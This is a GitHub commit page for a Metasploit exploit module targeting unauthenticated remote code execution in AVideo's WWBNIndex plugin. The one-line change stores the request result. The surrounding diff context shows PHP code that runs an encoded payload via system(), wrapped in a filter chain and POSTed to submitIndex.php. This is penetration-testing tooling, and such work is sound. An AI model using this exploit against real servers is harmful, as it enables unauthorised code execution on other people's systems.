Skip to content

Commit 3900680

Browse files
Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
Co-authored-by: jheysel-r7 <[email protected]>
1 parent 3560860 commit 3900680

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -81,7 +81,7 @@ def initialize(info = {})
8181
def exploit
8282
php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
8383
filter_payload = generate_php_filter_payload(php_code)
84-
send_request_cgi(
84+
res = send_request_cgi(
8585
'method' => 'POST',
8686
'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
8787
'ctype' => 'application/x-www-form-urlencoded',

0 commit comments

Comments
 (0)